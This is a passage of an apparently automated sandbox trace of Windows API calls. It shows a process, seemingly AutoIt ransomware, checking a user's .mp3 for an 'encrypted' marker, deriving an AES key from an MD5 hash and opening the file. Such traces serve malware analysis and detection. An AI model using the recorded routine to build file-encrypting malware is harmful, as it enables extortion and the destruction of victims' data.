(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.620] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.620] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0038.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.621] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0038.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.621] CloseHandle (hObject=0x128) returned 1 [0038.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.621] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.622] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.622] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.622] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.622] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.622] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.622] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.622] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.622] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.623] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5efa240, ftCreationTime.dwHighDateTime=0x1d5bf9d, ftLastAccessTime.dwLowDateTime=0x54f4ee0, ftLastAccessTime.dwHighDateTime=0x1d5be37, ftLastWriteTime.dwLowDateTime=0x54f4ee0, ftLastWriteTime.dwHighDateTime=0x1d5be37, nFileSizeHigh=0x0, nFileSizeLow=0x13874, dwReserved0=0x0, dwReserved1=0x777648, cFileName="XajMo5BmFRMN.mp3", cAlternateFileName="XAJMO5~1.MP3")) returned 0x7c20c0 [0038.623] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.623] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5efa240, ftCreationTime.dwHighDateTime=0x1d5bf9d, ftLastAccessTime.dwLowDateTime=0x54f4ee0, ftLastAccessTime.dwHighDateTime=0x1d5be37, ftLastWriteTime.dwLowDateTime=0x54f4ee0, ftLastWriteTime.dwHighDateTime=0x1d5be37, nFileSizeHigh=0x0, nFileSizeLow=0x13874, dwReserved0=0x0, dwReserved1=0x777648, cFileName="XajMo5BmFRMN.mp3", cAlternateFileName="XAJMO5~1.MP3")) returned 0x7c20c0 [0038.623] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.623] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ajMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jMo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mo5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BmFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mFRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FRMN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.625] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.625] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.625] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.625] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.625] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.625] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.625] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.625] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5efa240, ftCreationTime.dwHighDateTime=0x1d5bf9d, ftLastAccessTime.dwLowDateTime=0x54f4ee0, ftLastAccessTime.dwHighDateTime=0x1d5be37, ftLastWriteTime.dwLowDateTime=0x54f4ee0, ftLastWriteTime.dwHighDateTime=0x1d5be37, nFileSizeHigh=0x0, nFileSizeLow=0x13874, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="XajMo5BmFRMN.mp3", cAlternateFileName="XAJMO5~1.MP3")) returned 0x7c2240 [0038.625] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.626] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.626] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.626] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.626] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.626] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.626] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.626] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0038.627] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.627] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.627] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.627] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.627] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.627] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.627] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.627] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.627] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.627] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.627] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.627] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.627] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.628] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.628] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.628] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.628] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0038.628] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.628] CryptDestroyHash (hHash=0x7c2100) returned 1 [0038.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xajmo5bmfrmn.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.628] SetFilePointerEx (in: 